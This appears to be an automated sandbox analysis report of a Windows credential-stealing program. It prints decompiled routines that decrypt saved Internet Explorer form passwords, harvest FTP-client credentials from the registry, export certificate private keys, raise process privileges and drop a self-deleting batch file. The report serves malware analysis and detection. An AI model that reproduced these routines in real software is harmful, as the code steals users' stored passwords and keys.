lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404023
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404040
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040410A
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040411D

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Strings

*.*, xrefs: 00403FC5
\*.*, xrefs: 00403FB6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 19f221371bcf29dc0fb006707e9f4b1343e817989a724613998be1342034dd9f
Instruction ID: 0e5482085a8478f848b24922490d45c82c48751e20b01fa21e1f70377cfbccc4
Opcode Fuzzy Hash: 19f221371bcf29dc0fb006707e9f4b1343e817989a724613998be1342034dd9f
Instruction Fuzzy Hash: 90413DB150010DAADF21AF61DC02BEE7B79AF84308F1080B7B609B54B1D77D9EA09B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A364, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t50;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t85;

				_t80 = __ecx;
				_t50 = lstrlenW(_a8);
				if(_t50 != 0) {
					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
					_t81 = 0;
					_v48 = 0;
					while(_t81 < 0x14) {
						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
						_t81 = _t81 + 1;
					}
					_t84 = 0;
					_v52 = 0;
					while(_t84 < 0x14) {
						_push( *(_t84 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t85 = _t85 + 0xc;
						_v52 = E00401D69(_v52,  &_v44);
						_t84 = _t84 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E00401D69(_v52,  &_v44);
					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t67 = _t66;
					if(_t67 != 0) {
						_v60 = _t67;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t30);
							_push(_v56);
							_pop( *_t32);
							_push(_v60);
							_pop( *_t34);
							_v72 = 0;
							if( *0x41442d != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x41442d() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E004017D5(_v60);
					}
					return E004017D5(_v52);
				} else {
					return _t50;
				}
			}

APIs

lstrlenW.KERNEL32(?), ref: 0040A36E
wsprintfA.USER32 ref: 0040A3EB
lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A474
LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A409
%02X, xrefs: 0040A3B2, 0040A3E2

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FD8(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _t31;
				void* _t40;

				_v332 = 0;
				_t31 = _a8;
				if(_t31 == 0 ||  *_t31 == 0) {
					L12:
					return E004017D5(_v332);
				} else {
					E00404F77(_a4, E00401D15(_a8, _a12)); // executed
					E004017D5(_t33);
					_v332 = E00401D15(_a8, "\*.*");
					E00401803( &_v324, 0x13e);
					_t40 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t40;
					if(_t40 + 1 == 0) {
						goto L12;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									E00404F77(_a4, E00401D69(E00401D69(E00401D15(_a8, "\\"), _v336), _a12));
									E004017D5(_t53);
								}
							}
						}
					} while (FindNextFileA(_v328,  &_v324) != 0);
					FindClose(_v328);
					goto L12;
				}
			}

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405047
lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405076
lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405090
FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050E8
FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050FB

Strings

\*.*, xrefs: 00405016

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: 1e9dea5cfd5ce7fabfaf121f709474c518a1ee34b0066c664dc39b055b9c7958
Instruction ID: b26a634762e2f79233f71d3dbaa1eefbd2c1f05767a16118d2fd1dfdcfdb69c5
Opcode Fuzzy Hash: 1e9dea5cfd5ce7fabfaf121f709474c518a1ee34b0066c664dc39b055b9c7958
Instruction Fuzzy Hash: 7731FE71800119AADF21AF61CC42BEE7779EF44308F5440B7B508B61B1D7789E909E99

Uniqueness

Uniqueness Score: -1.00%

Function 00402896, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402896(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				int _t28;
				void* _t30;

				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004028D1
GetCurrentProcess.KERNEL32 ref: 004028DB
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004028E9
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
CloseHandle.KERNEL32(00000000), ref: 0040293F

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D423, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040D423(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				CHAR** _v16;
				CHAR* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _t48;
				int _t50;
				int _t54;
				CHAR** _t59;
				CHAR** _t62;
				CHAR** _t66;
				CHAR** _t71;
				intOrPtr _t79;
				CHAR** _t81;
				void* _t82;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 0x48, 0);
				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
					_t48 =  *0x414431(0, 0x416057); // executed
					_v12 = _t48;
					if(_v12 != 0) {
						_t82 = 0;
						while(1) {
							_t82 =  *0x414435(_v12, _t82);
							_t94 = _t82;
							if(_t82 == 0) {
								break;
							}
							_t79 =  *((intOrPtr*)(_t82 + 0xc));
							_v16 =  *((intOrPtr*)(_t79 + 0x68));
							_t81 =  *(_t79 + 0x6c);
							__eflags = _t81;
							if(__eflags != 0) {
								while(1) {
									__eflags = _v16;
									if(__eflags == 0) {
										goto L28;
									}
									_t50 = lstrcmpA( *_t81, "2.5.29.37");
									__eflags = _t50;
									if(_t50 == 0) {
										__eflags = _t81[2];
										if(_t81[2] != 0) {
											_v20 = E004017EC(_t81[2]);
											E00401823(_t81[3], _v20, _t81[2]);
											_t54 = lstrcmpA(_v20, 0x416064);
											__eflags = _t54;
											if(_t54 == 0) {
												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
												__eflags = _t59;
												if(_t59 != 0) {
													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
													__eflags = _t62;
													if(_t62 != 0) {
														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
														__eflags = _t66;
														if(_t66 != 0) {
															_v40 = E004017EC(_v36);
															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
															__eflags = _t71;
															if(_t71 != 0) {
																E00401486(_a4, 0xbeef0000);
																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
																E004014BC(_a4, _v40, _v36);
															}
															E004017D5(_v40);
														}
														 *0x414401(_v32);
													}
													 *0x414405(_v24, 0);
												}
											}
											E004017D5(_v20);
										}
									}
									_t81 =  &(_t81[4]);
									_t40 =  &_v16;
									 *_t40 = _v16 - 1;
									__eflags =  *_t40;
								}
							}
							L28:
						}
						 *0x414439(_v12, 0);
					}
				}
				return E00401553(_t79, _t94, _a4, _v8);
			}

APIs

CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B

Strings

2.5.29.37, xrefs: 0040D4EC

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmp$AllocCertLocalOpenStoreSystem
String ID: 2.5.29.37
API String ID: 1553736721-3842544949
Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402896, Relevance: 6.1, APIs: 4, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402896(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				void* _t23;
				int _t28;
				void* _t30;

				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						_t23 = GetCurrentProcess();
						_push( &_v16);
						_push(0x20);
						_push(_t23);
						if( *0x41440d() != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001), ref: 004028D1
GetCurrentProcess.KERNEL32 ref: 004028DB
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
CloseHandle.KERNEL32(00000000), ref: 0040293F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
String ID:
API String ID: 1569164952-0
Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004106D5, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 156
stringfilelibraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004106D5(void* __eax, void* __edx, void* __eflags) {
				CHAR* _v8;
				char* _v12;
				void* _v16;
				char* _v20;
				CHAR* _v24;
				char* _t34;
				char* _t35;
				void* _t39;
				void* _t43;
				void* _t45;
				struct HINSTANCE__* _t49;
				char* _t59;
				void* _t60;

				_v24 = E004017EC(0x105);
				wsprintfA(_v24, "%d.bat", GetTickCount());
				_v8 = E004017EC(0x105);
				_t34 = E004017EC(0x105);
				_v20 = _t34;
				_t35 = E004017EC(0x105);
				_v12 = _t35;
				GetModuleFileNameA( *0x4176b6, _v8, 0x104);
				if(GetTempPathA(0x104, _v20) != 0) {
					lstrcatA(_v20, _v24);
				}
				_t39 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0); // executed
				_v16 = _t39;
				if((_t39 + 0x00000001 & _t39 + 0x00000001) != 0) {
					L6:
					_t43 = E004013C2(_v16, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", lstrlenA("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ")); // executed
					CloseHandle(_v16);
					_t45 = _t43;
					if(_t45 != 0) {
						wsprintfA(_v12, "      \"%s\"   ", _v8);
						_t49 = LoadLibraryA("shell32.dll");
						if(_t49 != 0 && GetProcAddress(_t49, "ShellExecuteA") != 0) {
							ShellExecuteA(0, "open", _v20, _v12, 0, 0); // executed
						}
					}
					L11:
					E004017D5(_v24);
					E004017D5(_v8);
					E004017D5(_v20);
					return E004017D5(_v12);
				}
				lstrcpyA(_v20, _v8);
				_t59 = StrRChrIA(_v20, 0, 0x5c);
				if(_t59 != 0) {
					lstrcpyA(_t59 + 1, _v24);
				}
				_t60 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0);
				_v16 = _t60;
				if(_t60 + 1 == 0) {
					goto L11;
				} else {
					goto L6;
				}
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GetTickCount.KERNEL32 ref: 004106FA
wsprintfA.USER32 ref: 00410708
GetModuleFileNameA.KERNEL32(00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410768
GetTempPathA.KERNEL32(00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0041077E
lstrcatA.KERNEL32(?,?,00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410792
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107AB
lstrcpyA.KERNEL32(?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107C2
StrRChrIA.SHLWAPI(?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104), ref: 004107CE
lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004107DC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000), ref: 004107F3
lstrlenA.KERNEL32( :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 00410803
CloseHandle.KERNEL32(00410C71,00000000,00410C71, :ktk del %1 if exist %1 goto ktk del %0 ,00000000, :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000), ref: 0041081A
wsprintfA.USER32 ref: 00410831
LoadLibraryA.KERNEL32(shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 0041083E
GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0041084D
ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000,00000000,ShellExecuteA,shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410867

Strings

:ktk del %1 if exist %1 goto ktk del %0 , xrefs: 004107FE, 00410809
"%s" , xrefs: 00410829
open, xrefs: 00410860
shell32.dll, xrefs: 00410839
%d.bat, xrefs: 00410700
ShellExecuteA, xrefs: 00410847

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Createlstrcpywsprintf$AddressAllocCloseCountExecuteHandleLibraryLoadLocalModuleNamePathProcShellTempTicklstrcatlstrlen
String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
API String ID: 2116904195-4169620016
Opcode ID: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
Instruction ID: ac578fb0db49b64cbbfa247985a17d63ff0acc43852cd1b9113235f47bfa6a9d
Opcode Fuzzy Hash: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
Instruction Fuzzy Hash: ED419E31B446057BDF19A6A68C03FEFB5B79B84704F24803A7215F62E1EAB84DC09A4C

Uniqueness

Uniqueness Score: -1.00%

Function 004057C2, Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057C2(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t29;

				E00405662(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
				E00405662(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
				E00405662(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
				_t29 = RegOpenKeyA( *0x4140fe, _a8,  &_v8);
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						E004057C2(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405862
RegEnumKeyExA.ADVAPI32 ref: 00405892
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058E0

Strings

Last Server Type, xrefs: 0040582C
Last Server Port, xrefs: 00405836
Last Server User, xrefs: 0040583B
Path, xrefs: 00405803
Server.Host, xrefs: 00405812
Server Type, xrefs: 004057D0
Server.User, xrefs: 0040580D
User, xrefs: 004057DF
ServerType, xrefs: 004057FE
Host, xrefs: 004057E4
Server.Port, xrefs: 00405808
Last Server Pass, xrefs: 00405845
Last Server Host, xrefs: 00405840
Port, xrefs: 004057DA
Pass, xrefs: 004057E9
Server.Pass, xrefs: 00405817
Last Server Path, xrefs: 00405831
Remote Dir, xrefs: 004057D5

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: 3a6fec7d79853db9d550c02d0bc0af093802cc0e0543318cab51293c358c822d
Instruction ID: 485885c6e778c5f0ce236eab50da9cdf0f754c6351278a17f13cbc202cb47549
Opcode Fuzzy Hash: 3a6fec7d79853db9d550c02d0bc0af093802cc0e0543318cab51293c358c822d
Instruction Fuzzy Hash: 29213B35680208BADF216E91EC12FDD7A75AB84B04F20C467B605751E1DBBD5A90AF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD8, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401FD8(void* __edx) {
				void* _v8;
				char _v4104;
				int _v4108;
				int _v4112;
				char _v4116;
				char _v4120;
				int _v4124;
				void* _v4128;
				intOrPtr _v4132;
				long _t56;
				void** _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t71;
				long _t76;
				void* _t80;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t102;
				void* _t112;
				void* _t115;
				void* _t120;

				_t111 = __edx;
				if( *0x414082 != 0) {
					E004017D5( *0x414082);
					 *0x414082 = 0;
				}
				if( *0x414086 != 0) {
					E004017D5( *0x414086);
					 *0x414086 = 0;
				}
				E00401000( &_v4116, _t111,  &_v4116); // executed
				E00401000( &_v4120, _t111,  &_v4120);
				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
				if(_t56 != 0) {
					L19:
					E00401486(_v4116, 0);
					E00401486(_v4120, 0);
					_t60 =  &_v4128;
					_push(_t60);
					_push(_v4116);
					L00410DBE();
					if(_t60 >= 0) {
						_v4124 = E0040106A(_t60, _t111, _v4116);
						 *0x414082 = E004017EC(_v4124);
						_t71 = GlobalLock(_v4128);
						if(_t71 != 0) {
							_t115 =  *0x414082; // 0x0
							memcpy(_t115, _t71, _v4124);
							_t120 = _t120 + 0xc;
							GlobalUnlock(_v4128);
						}
					}
					_t61 =  &_v4128;
					_push(_t61);
					_push(_v4120);
					L00410DBE();
					if(_t61 >= 0) {
						_v4124 = E0040106A(_t61, _t111, _v4120);
						_t65 = E004017EC(_v4124); // executed
						 *0x414086 = _t65;
						_t61 = GlobalLock(_v4128);
						if(_t61 != 0) {
							_t112 =  *0x414086; // 0x0
							memcpy(_t112, _t61, _v4124);
							_t61 = GlobalUnlock(_v4128);
						}
					}
					_t62 = E00401019(_t61, _t111, _v4116); // executed
					_t63 = E00401019(_t62, _t111, _v4120); // executed
					return _t63;
				}
				_v4112 = 0;
				while(1) {
					_v4108 = 0xfff;
					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
					if(_t76 != 0) {
						break;
					}
					_t80 = E00401D15("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
					if(_t80 != 0) {
						_t111 = _t80;
						_t83 = E00401D69(_t80,  &_v4104);
						if(_t83 != 0) {
							_v4132 = _t83;
							_t85 = E00401C8E(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
							_t86 = _t85;
							if(_t86 != 0 && _t86 > 1) {
								_push(_t86);
								E0040149B(_v4116, _t86, _v4124); // executed
								_t90 = E00401C8E(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
								_t91 = _t90;
								if(_t91 == 0 || _v4124 <= 1) {
									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
								} else {
									_push(_t91);
									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104));
									_t102 = _t91;
									E0040149B(_v4120, _t102, _v4124);
									E004017D5();
								}
								E004017D5();
							}
							E004017D5(_v4132);
						}
					}
					_v4112 = _v4112 + 1;
				}
				RegCloseKey(_v8);
				goto L19;
			}

0x00401fd8
0x00401fea
0x00401ff2
0x00401ff7
0x00401ff7
0x00402008
0x00402010
0x00402015
0x00402015
0x00402026
0x00402032
0x00402045
0x0040204c
0x004021ad
0x004021b5
0x004021c2
0x004021c7
0x004021cd
0x004021ce
0x004021d4
0x004021db
0x004021e8
0x004021f9
0x00402209
0x0040220b
0x00402215
0x0040221b
0x0040221b
0x00402223
0x00402223
0x0040220b
0x00402228
0x0040222e
0x0040222f
0x00402235
0x0040223c
0x00402249
0x00402255
0x0040225a
0x0040226a
0x0040226c
0x00402276
0x0040227c
0x00402284
0x00402284
0x0040226c
0x0040228f
0x0040229a
0x004022a2
0x004022a2
0x00402052
0x0040205c
0x0040205c
0x00402085
0x0040208c
0x00000000
0x00000000
0x004020a1
0x004020a3
0x004020a9
0x004020b8
0x004020ba
0x004020c0
0x004020dd
0x004020e2
0x004020e4
0x004020f3
0x00402101
0x0040211d
0x00402122
0x00402124
0x00402185
0x0040212f
0x0040212f
0x0040214b
0x00402150
0x0040215e
0x00402163
0x00402163
0x0040218a
0x0040218a
0x00402195
0x00402195
0x004020ba
0x0040219a
0x0040219a
0x004021a8
0x00000000

